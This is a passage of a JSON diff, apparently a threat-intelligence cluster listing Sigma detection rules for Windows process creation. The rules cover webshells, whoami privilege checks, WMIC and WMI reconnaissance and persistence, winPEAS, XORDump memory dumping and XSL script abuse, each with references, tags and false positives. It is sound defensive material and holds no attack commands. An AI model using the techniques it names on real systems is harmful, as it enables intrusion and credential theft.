"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_webbrowserpassview.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "value": "Chopper Webshell Process Pattern", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ], + "creation_date": "2022/10/01", + "filename": "proc_creation_win_webshell_chopper.yml", + "author": "Florian Roth (rule), MSTI (query)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", + "value": "Webshell Detection With Command Line Keywords", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ], + "creation_date": "2017/01/01", + "filename": "proc_creation_win_webshell_detection.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "value": "Webshell Hacking Activity Patterns", + "meta": { + "refs": [ + "https://youtu.be/7aemGhaE9ds?t=641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ], + "creation_date": "2022/03/17", + "filename": "proc_creation_win_webshell_hacking.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", + "value": "Webshell Recon Detection Via CommandLine & Processes", + "meta": { + "refs": [ + "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2020/07/22", + "filename": "proc_creation_win_webshell_recon_detection.yml", + "author": "Cian Heasley, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", + "value": "Shells Spawned by Web Servers", + "meta": { + "refs": [ + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1190" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_webshell_spawn.yml", + "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Particular web applications may spawn a shell process legitimately" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", + "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "value": "Usage Of Web Request Commands And Cmdlets", + "meta": { + "refs": [ + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml", + "author": "James Pemberton / @4A616D6573", + "level": "medium", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "value": "Wevtutil Recon", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_wevtutil_recon.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitmate usage of the utility by administrators to query the event log" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors", + "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "value": "Run Whoami as Privileged User", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://nsudo.m2team.org/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/01/28", + "filename": "proc_creation_win_whoami_as_priv_user.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.", + "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1", + "value": "Run Whoami as SYSTEM", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2019/10/23", + "filename": "proc_creation_win_whoami_as_system.yml", + "author": "Teymur Kheirkhabarov, Florian Roth", + "level": "high", + "falsepositive": [ + "Possible name overlap with NT AUHTORITY substring to cover all languages" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. This is often used after a privilege escalation attempt.", + "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "value": "Run Whoami Showing Privileges", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2021/05/05", + "filename": "proc_creation_win_whoami_priv.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity (rare lookups on current privileges)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", + "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "value": "Windows 10 Scheduled Task SandboxEscaper 0-day", + "meta": { + "refs": [ + "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" + ], + "creation_date": "2019/05/22", + "filename": "proc_creation_win_win10_sched_task_0day.yml", + "author": "Olaf Hartong", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", + "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", + "value": "Suspicious WindowsTerminal Child Processes", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/windowsterminalprofile.html", + "https://twitter.com/nas_bench/status/1550836225652686848", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence" + ], + "creation_date": "2022/07/25", + "filename": "proc_creation_win_windows_terminal_susp_children.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Other legitimate \"Windows Terminal\" profiles" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "value": "Detect Execution of winPEAS", + "meta": { + "refs": [ + "https://github.com/carlospolop/PEASS-ng", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" + ], + "creation_date": "2022/09/19", + "filename": "proc_creation_win_winpeas_tool.yml", + "author": "Georg Lauenstein", + "level": "high", + "falsepositive": [ + "Other programs that use the same command line flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Installation of a Exchange Transport Agent", + "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", + "value": "MSExchange Transport Agent Installation", + "meta": { + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ], + "creation_date": "2021/06/08", + "filename": "proc_creation_win_win_exchange_transportagent.yml", + "author": "Tobias Michalski", + "level": "medium", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.", + "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "value": "Suspicious Get ComputerSystem Information with WMIC", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/09/08", + "filename": "proc_creation_win_wmic_computersystem_recon.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", + "value": "Suspicious Get Local Groups Information with WMIC", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/12", + "filename": "proc_creation_win_wmic_group_recon.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts", + "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "value": "WMIC Hotfix Recon", + "meta": { + "refs": [ + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_wmic_hotfix_enum.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.", + "uuid": "221b251a-357a-49a9-920a-271802777cc0", + "value": "Suspicious WMI Reconnaissance", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_wmic_reconnaissance.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary might use WMI to execute commands on a remote system", + "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", + "value": "WMI Remote Command Execution", + "meta": { + "refs": [ + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/03/13", + "filename": "proc_creation_win_wmic_remote_command.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", + "value": "WMI Reconnaissance List Remote Services", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_wmic_remote_service.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Uninstall an application with wmic", + "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "value": "WMI Uninstall An Application", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/01/28", + "filename": "proc_creation_win_wmic_remove_application.yml", + "author": "frac113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of wmic to start or stop a service", + "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "value": "WMIC Service Start/Stop", + "meta": { + "refs": [ + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_wmic_service.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts", + "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "value": "WMIC Unquoted Services Path Lookup", + "meta": { + "refs": [ + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_win_wmic_unquoted_service_search.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects wmiprvse spawning processes", + "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "value": "Wmiprvse Spawning Process", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2019/08/15", + "filename": "proc_creation_win_wmiprvse_spawning_process.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "value": "WMI Backdoor Exchange Transport Agent", + "meta": { + "refs": [ + "https://twitter.com/cglyer/status/1182389676876980224", + "https://twitter.com/cglyer/status/1182391019633029120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2019/10/11", + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMI script event consumers", + "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "value": "WMI Persistence - Script Event Consumer", + "meta": { + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ], + "creation_date": "2018/03/07", + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMI spawning a PowerShell process", + "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "value": "WMI Spawning Windows PowerShell", + "meta": { + "refs": [ + "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ], + "creation_date": "2019/04/03", + "filename": "proc_creation_win_wmi_spwns_powershell.yml", + "author": "Markus Neis / @Karneades", + "level": "high", + "falsepositive": [ + "AppvClient", + "CCM" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", + "value": "Microsoft Workflow Compiler", + "meta": { + "refs": [ + "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_workflow_compiler.yml", + "author": "Nik Seetharaman, frack113", + "level": "high", + "falsepositive": [ + "Legitimate MWC use (unlikely in modern enterprise environments)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", + "value": "UEFI Persistence Via Wpbbin - ProcessCreation", + "meta": { + "refs": [ + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://persistence-info.github.io/Data/wpbbin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ], + "creation_date": "2022/07/18", + "filename": "proc_creation_win_wpbbin_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "value": "Write Protect For Storage Disabled", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2021/06/11", + "filename": "proc_creation_win_write_protect_for_storage_disabled.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", + "value": "Wscript Shell Run In CommandLine", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/08/31", + "filename": "proc_creation_win_wscript_shell_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare legitimate inline scripting by some administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "value": "Wsudo Suspicious Execution", + "meta": { + "refs": [ + "https://github.com/M2Team/Privexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" + ], + "creation_date": "2022/12/02", + "filename": "proc_creation_win_wsudo_susp_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "value": "Wusa Extracting Cab Files", + "meta": { + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/04", + "filename": "proc_creation_win_wusa_susp_cab_extraction.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "value": "Wusa Extracting Cab Files From Suspicious Paths", + "meta": { + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://www.echotrail.io/insights/search/wusa.exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/05", + "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of XORDump process memory dumping utility", + "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "value": "XORDump Use", + "meta": { + "refs": [ + "https://github.com/audibleblink/xordump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/01/28", + "filename": "proc_creation_win_xordump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Another tool that uses the command line switches of XORdump" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "value": "XSL Script Processing", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xsl_script_processing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_xsl_script_processing.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Raw disk access using illegitimate tools, 